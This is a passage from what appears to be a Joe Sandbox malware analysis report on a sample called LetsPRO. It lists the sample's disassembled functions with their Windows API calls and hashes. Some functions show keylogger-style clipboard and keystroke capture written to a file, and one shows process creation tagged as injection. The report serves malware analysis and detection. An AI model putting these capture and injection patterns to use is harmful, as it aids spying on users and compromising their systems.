                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__endthreadex__freeptd__getptd
                                        • String ID:
                                        • API String ID: 4175385852-0
                                        • Opcode ID: 944817bc67631a11d0650125a895242fb8d4404228c5b568e6465383ef3e3d04
                                        • Instruction ID: f95977a8fe117be8f487ce57f73c161a667c36b899cd167dd3d9e53b9e6105b6
                                        • Opcode Fuzzy Hash: 944817bc67631a11d0650125a895242fb8d4404228c5b568e6465383ef3e3d04
                                        • Instruction Fuzzy Hash: BDE0ECB5940A06AFE758ABA1CA45F6EB766FF88301F200048E2025B2A1DB75A941DF25
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3F964 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __getptd_noexit.LIBCMT ref: 03F3F969
                                          • Part of subcall function 03F43DE2: GetLastError.KERNEL32(00000001,00000000,03F3F920,03F3F6FC,00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76), ref: 03F43DE6
                                          • Part of subcall function 03F43DE2: ___set_flsgetvalue.LIBCMT ref: 03F43DF4
                                          • Part of subcall function 03F43DE2: __calloc_crt.LIBCMT ref: 03F43E08
                                          • Part of subcall function 03F43DE2: DecodePointer.KERNEL32(00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000,?,03F43F06), ref: 03F43E22
                                          • Part of subcall function 03F43DE2: GetCurrentThreadId.KERNEL32 ref: 03F43E38
                                          • Part of subcall function 03F43DE2: SetLastError.KERNEL32(00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000,?,03F43F06), ref: 03F43E50
                                        • __freeptd.LIBCMT ref: 03F3F973
                                          • Part of subcall function 03F43FA6: TlsGetValue.KERNEL32(?,?,03F410F0,00000000,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F43FC7
                                          • Part of subcall function 03F43FA6: TlsGetValue.KERNEL32(?,?,03F410F0,00000000,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F43FD9
                                          • Part of subcall function 03F43FA6: DecodePointer.KERNEL32(00000000,?,03F410F0,00000000,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F43FEF
                                          • Part of subcall function 03F43FA6: __freefls@4.LIBCMT ref: 03F43FFA
                                          • Part of subcall function 03F43FA6: TlsSetValue.KERNEL32(00000018,00000000,?,03F410F0,00000000,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F4400C
                                        • ExitThread.KERNEL32 ref: 03F3F97C
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                        • String ID:
                                        • API String ID: 4224061863-0
                                        • Opcode ID: 2318c7858f690339d8d886bc47e2e590a117c41d60faee7f5f593c86b571aa20
                                        • Instruction ID: f1e809332274143b423c261b00626c1b603dfc0a523ebfa53d67fe0ddf3f5f4d
                                        • Opcode Fuzzy Hash: 2318c7858f690339d8d886bc47e2e590a117c41d60faee7f5f593c86b571aa20
                                        • Instruction Fuzzy Hash: C4C04C2D40470D7BAB147B719D1991A7E6D9D802507540511A90589150DE65DC618590
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F33360 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Time_memmovetime
                                        • String ID:
                                        • API String ID: 1463837790-0
                                        • Opcode ID: 79d05bf43f2b3214fb67f37af52647ce36347fc2b8f7fe19cf22f9b4f0b8b3ee
                                        • Instruction ID: f41aef6a845259abf2ffcd0a8299b3aef9f012c84219b2e7d6d85e7ab7684bff
                                        • Opcode Fuzzy Hash: 79d05bf43f2b3214fb67f37af52647ce36347fc2b8f7fe19cf22f9b4f0b8b3ee
                                        • Instruction Fuzzy Hash: C951A27AB00206AFD715DF69C8C0E6AB7A9FF46214718866EE919CB704DB31F851CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F2FA0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 025F3013
                                        • recv.WS2_32(?,?,00040000,00000000), ref: 025F3034
                                          • Part of subcall function 025F71ED: __getptd_noexit.LIBCMT ref: 025F71ED
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd_noexitrecvselect
                                        • String ID:
                                        • API String ID: 4248608111-0
                                        • Opcode ID: 2159623549d0ebdaab68689db828f0340cd0891e5b5e6497afb403c28c095bda
                                        • Instruction ID: 2a794b3226485a5871c291fa88431eb7313567621f02ed7ef9d6cb0d00922c9b
                                        • Opcode Fuzzy Hash: 2159623549d0ebdaab68689db828f0340cd0891e5b5e6497afb403c28c095bda
                                        • Instruction Fuzzy Hash: 7421B670E40248EBEB609F64CC88BAB77A9FF45314F1005E6E7055B284D770AD84CF69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F32FD0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03F33043
                                        • recv.WS2_32(?,?,00040000,00000000), ref: 03F33064
                                          • Part of subcall function 03F3F91B: __getptd_noexit.LIBCMT ref: 03F3F91B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd_noexitrecvselect
                                        • String ID:
                                        • API String ID: 4248608111-0
                                        • Opcode ID: 0f84c839bcd569f508dce0bf63d5fa12e453ab6a1818a8e915112f68d813cdf0
                                        • Instruction ID: 8032d18fa886df7414227eb7f5ef0f7b5c349189f96d5a0fa4dcca08be335315
                                        • Opcode Fuzzy Hash: 0f84c839bcd569f508dce0bf63d5fa12e453ab6a1818a8e915112f68d813cdf0
                                        • Instruction Fuzzy Hash: 3E21A6B5E00309DFDB20EF65DC84BDA77A4EF06314F1845A6E5549F2A0D7B0A984CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F3230 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • send.WS2_32(?,?,00040000,00000000), ref: 025F3261
                                        • send.WS2_32(?,?,?,00000000), ref: 025F329E
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        • Opcode ID: fd40e5abfcfdc9578da23cbaf11c52e76ca28852826ad2f06a18219721c131cd
                                        • Instruction ID: 2fe4a75fa78d1b234ac60435d62ac1f3a5025e8f374bd777cd894a41b5dac22f
                                        • Opcode Fuzzy Hash: fd40e5abfcfdc9578da23cbaf11c52e76ca28852826ad2f06a18219721c131cd
                                        • Instruction Fuzzy Hash: E511A972A0128477E790CB69DCC4B5E7B59FB81364F1051A5EB0DD7240D370DD459658
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F33260 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • send.WS2_32(?,?,00040000,00000000), ref: 03F33291
                                        • send.WS2_32(?,?,?,00000000), ref: 03F332CE
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        • Opcode ID: 6d87591640ca91b5006943a3996ad127ee5b57e86d7b2a54d948f83fb495112a
                                        • Instruction ID: f88d97cadd80edcea5f0359c1641636a328767b38a15ab16b808d64a8d82a35f
                                        • Opcode Fuzzy Hash: 6d87591640ca91b5006943a3996ad127ee5b57e86d7b2a54d948f83fb495112a
                                        • Instruction Fuzzy Hash: ED11A17AB09304BBD760CA6ADC89B5ABB99FB82264F144137EA18DB290D270E9418654
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F30B0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: SleepTimetime
                                        • String ID:
                                        • API String ID: 346578373-0
                                        • Opcode ID: f1037e3ab8abd0ff80eb9167e995de90bbc4b3a20d6b03ce6aa09e56e83dd0d9
                                        • Instruction ID: 9e29ef96c9c62baf52afefc53aa2d7ebf0c13fb740d9f33a37fd1653617da104
                                        • Opcode Fuzzy Hash: f1037e3ab8abd0ff80eb9167e995de90bbc4b3a20d6b03ce6aa09e56e83dd0d9
                                        • Instruction Fuzzy Hash: D201D43160024ABFE710DF28C8C8FADB7B9FB95304F1442A5D2058B680C770A9D5CBE5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F330E0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: SleepTimetime
                                        • String ID:
                                        • API String ID: 346578373-0
                                        • Opcode ID: 26abd1fd4512845795be7455c9cfeb7570d634c4f4b2f0a06dc112e0911d789c
                                        • Instruction ID: d3c3a71b0bf3379afb486dafe8891645c2154f3a2cfa1454ec205f8c3b002ad7
                                        • Opcode Fuzzy Hash: 26abd1fd4512845795be7455c9cfeb7570d634c4f4b2f0a06dc112e0911d789c
                                        • Instruction Fuzzy Hash: 6301F239A0020ABFD311EF28C8C8B69F7B9FB9A301F194266D10487290C771A9C6C7D1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F64E0 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • HeapCreate.KERNEL32(00000004,00000000,00000000,025F6190,00000000,025F5AF2), ref: 025F64FB
                                        • _free.LIBCMT ref: 025F6536
                                          • Part of subcall function 025F1280: __CxxThrowException@8.LIBCMT ref: 025F1290
                                          • Part of subcall function 025F1280: RtlDeleteCriticalSection.NTDLL(00000000), ref: 025F12A1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                        • String ID:
                                        • API String ID: 1116298128-0
                                        • Opcode ID: b32363f9c8e8a5b95b5187e4d18e2396cfc6d8e5d2d57bd0111dafba50c2a4f5
                                        • Instruction ID: 135c903858274617a6c63c443399fd59f19883b46f49baece9359404e3b65394
                                        • Opcode Fuzzy Hash: b32363f9c8e8a5b95b5187e4d18e2396cfc6d8e5d2d57bd0111dafba50c2a4f5
                                        • Instruction Fuzzy Hash: C2017AF0A00B408FC7709F6AD884A07FAE8BF98710B504A1EE2DAC7A14D370A545CF95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3CD00 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • HeapCreate.KERNEL32(00000004,00000000,00000000,03F3E04E,00000000,03F39800,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F3CD1B
                                        • _free.LIBCMT ref: 03F3CD56
                                          • Part of subcall function 03F31280: __CxxThrowException@8.LIBCMT ref: 03F31290
                                          • Part of subcall function 03F31280: DeleteCriticalSection.KERNEL32(00000000,03F3D3E6,03F56624,?,?,03F3D3E6,?,?,?,?,03F55A40,00000000), ref: 03F312A1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                        • String ID:
                                        • API String ID: 1116298128-0
                                        • Opcode ID: 0a3e60dc5a43c5f3b754e0216a937d92d52389828af2879065d189595f275b37
                                        • Instruction ID: b4b87f5c5ad9c4806be2a6987d2f641c3d9d99c43f886fd22785383957ee30ef
                                        • Opcode Fuzzy Hash: 0a3e60dc5a43c5f3b754e0216a937d92d52389828af2879065d189595f275b37
                                        • Instruction Fuzzy Hash: BD017AB0A00B459FD730DF6A9884A17FAE8BF99700B504A1EE2DAC6A20D370A105CF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401DC0 Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 00401DEE
                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 00401E00
                                          • Part of subcall function 00401BD0: GetModuleHandleA.KERNEL32(?), ref: 00401BDA
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: FreeHandleHeapModuleRead
                                        • String ID:
                                        • API String ID: 627478288-0
                                        • Opcode ID: ab871cd8e4baabd87cd8aa4c49eb0f992674a710188b76f39192ade9d00fd0b1
                                        • Instruction ID: 47e6e89657e11cf4bcb87a072d3143b0d1d83859a22f73af97cbbb24c1c97c3f
                                        • Opcode Fuzzy Hash: ab871cd8e4baabd87cd8aa4c49eb0f992674a710188b76f39192ade9d00fd0b1
                                        • Instruction Fuzzy Hash: 69E0E531A00111ABD631AF15EE4469F76AC9B05746B010037F954B76B0D334BD8097DD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3E480 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • CreateThread.KERNEL32(00000000,00000000,03F3DF10,00000000,00000000,00000000), ref: 03F3E49B
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03F41168,?,?,?,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F3E4A9
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 1891408510-0
                                        • Opcode ID: c34b1b27b5ada4d43dd94fda12aba36420e1fa95d13b004553ea9d210db29043
                                        • Instruction ID: edfd7880cd26bae77436d80d53d2cf41166cb8f1e01d69c5d2cf5da89a85bba9
                                        • Opcode Fuzzy Hash: c34b1b27b5ada4d43dd94fda12aba36420e1fa95d13b004553ea9d210db29043
                                        • Instruction Fuzzy Hash: 1CE012B554430EBFEB10EA64EC95E36339CDB19330B204615FA21D2248D63198508660
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3F983 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • __getptd.LIBCMT ref: 03F3F98F
                                          • Part of subcall function 03F43E5B: __getptd_noexit.LIBCMT ref: 03F43E5E
                                          • Part of subcall function 03F43E5B: __amsg_exit.LIBCMT ref: 03F43E6B
                                          • Part of subcall function 03F3F964: __getptd_noexit.LIBCMT ref: 03F3F969
                                          • Part of subcall function 03F3F964: __freeptd.LIBCMT ref: 03F3F973
                                          • Part of subcall function 03F3F964: ExitThread.KERNEL32 ref: 03F3F97C
                                        • __XcptFilter.LIBCMT ref: 03F3F9B0
                                          • Part of subcall function 03F4418F: __getptd_noexit.LIBCMT ref: 03F44195
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                        • String ID:
                                        • API String ID: 418257734-0
                                        • Opcode ID: decfe75406151112e6d1aad87c9590d91e596757d6b042d3daa6160426949c54
                                        • Instruction ID: f5ab95a440c046c7c0858c76043ddc277f183b76228ee05a633d1c3418c7d196
                                        • Opcode Fuzzy Hash: decfe75406151112e6d1aad87c9590d91e596757d6b042d3daa6160426949c54
                                        • Instruction Fuzzy Hash: A1E0ECB9901700EFEB18EBA1DC05F7D7B75AF45A11F200189E1016F2A1CB799940DA20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F46403 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __lock.LIBCMT ref: 03F4641B
                                          • Part of subcall function 03F48E5B: __mtinitlocknum.LIBCMT ref: 03F48E71
                                          • Part of subcall function 03F48E5B: __amsg_exit.LIBCMT ref: 03F48E7D
                                          • Part of subcall function 03F48E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03F43F06,0000000D,03F56340,00000008,03F43FFF,00000000,?,03F410F0,00000000,03F56278,00000008,03F41155,?), ref: 03F48E85
                                        • __tzset_nolock.LIBCMT ref: 03F4642C
                                          • Part of subcall function 03F45D22: __lock.LIBCMT ref: 03F45D44
                                          • Part of subcall function 03F45D22: ____lc_codepage_func.LIBCMT ref: 03F45D8B
                                          • Part of subcall function 03F45D22: __getenv_helper_nolock.LIBCMT ref: 03F45DAD
                                          • Part of subcall function 03F45D22: _free.LIBCMT ref: 03F45DE4
                                          • Part of subcall function 03F45D22: _strlen.LIBCMT ref: 03F45DEB
                                          • Part of subcall function 03F45D22: __malloc_crt.LIBCMT ref: 03F45DF2
                                          • Part of subcall function 03F45D22: _strlen.LIBCMT ref: 03F45E08
                                          • Part of subcall function 03F45D22: _strcpy_s.LIBCMT ref: 03F45E16
                                          • Part of subcall function 03F45D22: __invoke_watson.LIBCMT ref: 03F45E2B
                                          • Part of subcall function 03F45D22: _free.LIBCMT ref: 03F45E3A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                        • String ID:
                                        • API String ID: 1828324828-0
                                        • Opcode ID: b0e2a48e8cbe58c101d8935f958670d7c6a4d6441ee648888c43efe715c5ef1f
                                        • Instruction ID: c22e1d1ff5f7eaf66708fac033a6924cd0f2d12ba2c8c91d8b951c3132213378
                                        • Opcode Fuzzy Hash: b0e2a48e8cbe58c101d8935f958670d7c6a4d6441ee648888c43efe715c5ef1f
                                        • Instruction Fuzzy Hash: 66E0C238C45316D7CA22FBE0B922A1C7A306B91F21FA00169F060A9098CEB10181EA53
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004017B7 Relevance: 1.7, APIs: 1, Instructions: 218libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 08f3cb027e5e836f165beec56cfdc055c7157135e271e5d9a7bdb5dfb1414ad7
                                        • Instruction ID: 369afb116dce29ddf802fdad9d560ea3fc7219c16aa5b7e50199afa717a6020b
                                        • Opcode Fuzzy Hash: 08f3cb027e5e836f165beec56cfdc055c7157135e271e5d9a7bdb5dfb1414ad7
                                        • Instruction Fuzzy Hash: A09168B16053028FCB28CF19C580A2AF7E1FF84314F15896EE885AB3A1D774E945CF86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 03F3E850 Relevance: 72.1, APIs: 36, Strings: 5, Instructions: 311stringfilesynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 03F3E8A9
                                        • Sleep.KERNEL32(00000001,?,?,?,03F3604D), ref: 03F3E8B3
                                        • GetTickCount.KERNEL32 ref: 03F3E8BF
                                        • GetTickCount.KERNEL32 ref: 03F3E8D2
                                        • InterlockedExchange.KERNEL32(03F61F08,00000000), ref: 03F3E8DA
                                        • OpenClipboard.USER32(00000000), ref: 03F3E8E2
                                        • GetClipboardData.USER32(0000000D), ref: 03F3E8EA
                                        • GlobalSize.KERNEL32(00000000), ref: 03F3E8FB
                                        • GlobalLock.KERNEL32(00000000), ref: 03F3E90C
                                        • wsprintfW.USER32 ref: 03F3E985
                                        • _memset.LIBCMT ref: 03F3E9A3
                                        • GlobalUnlock.KERNEL32(00000000), ref: 03F3E9AC
                                        • CloseClipboard.USER32 ref: 03F3E9B2
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 03F3E9CA
                                        • CreateFileW.KERNEL32(03F60D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 03F3E9E4
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03F3EA02
                                        • lstrlenW.KERNEL32(03F55B48,?,00000000), ref: 03F3EA16
                                        • WriteFile.KERNEL32(00000000,03F55B48,00000000), ref: 03F3EA25
                                        • CloseHandle.KERNEL32(00000000), ref: 03F3EA2C
                                        • ReleaseMutex.KERNEL32(00000000), ref: 03F3EA38
                                        • GetKeyState.USER32(00000014), ref: 03F3EABC
                                        • lstrlenW.KERNEL32(03F5B4A8), ref: 03F3EB0B
                                        • wsprintfW.USER32 ref: 03F3EB1D
                                        • lstrlenW.KERNEL32(03F5B4D0), ref: 03F3EB3E
                                        • lstrlenW.KERNEL32(03F5B4D0), ref: 03F3EB61
                                        • wsprintfW.USER32 ref: 03F3EB7F
                                        • wsprintfW.USER32 ref: 03F3EB95
                                        • wsprintfW.USER32 ref: 03F3EBBF
                                        • lstrlenW.KERNEL32(00000000), ref: 03F3EC0B
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 03F3EC21
                                        • CreateFileW.KERNEL32(03F60D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 03F3EC3B
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03F3EC59
                                        • lstrlenW.KERNEL32(00000000,?,00000000), ref: 03F3EC69
                                        • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 03F3EC74
                                        • CloseHandle.KERNEL32(00000000), ref: 03F3EC7B
                                        • ReleaseMutex.KERNEL32(00000000), ref: 03F3EC88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                        • String ID: [$%s%s$%s%s$%s%s$[esc]
                                        • API String ID: 1637302245-2373594894
                                        • Opcode ID: c4afdc38111ef2365ae85505c29cdcfee827983e2a5948325fe3ec0d61d921a5
                                        • Instruction ID: 1c8a4095fcfce76466d5d271a8a12508a81db5f011ee218e50f08378219e5397
                                        • Opcode Fuzzy Hash: c4afdc38111ef2365ae85505c29cdcfee827983e2a5948325fe3ec0d61d921a5
                                        • Instruction Fuzzy Hash: 34C1D17690130ABFD730EF64DC58FAA7BB8BF19700F044A58F65AD6284D7709584CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F377E0 Relevance: 68.5, APIs: 30, Strings: 9, Instructions: 240libraryloaderinjectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 03F37804
                                        • _memset.LIBCMT ref: 03F37850
                                        • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03F37864
                                          • Part of subcall function 03F38720: _vswprintf_s.LIBCMT ref: 03F38731
                                        • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F37893
                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 03F378DA
                                          • Part of subcall function 03F37740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,03F378FC), ref: 03F37756
                                          • Part of subcall function 03F37740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,03F378FC,?,?,?,?,?,?,75920630), ref: 03F3775D
                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F3790A
                                        • _memset.LIBCMT ref: 03F37923
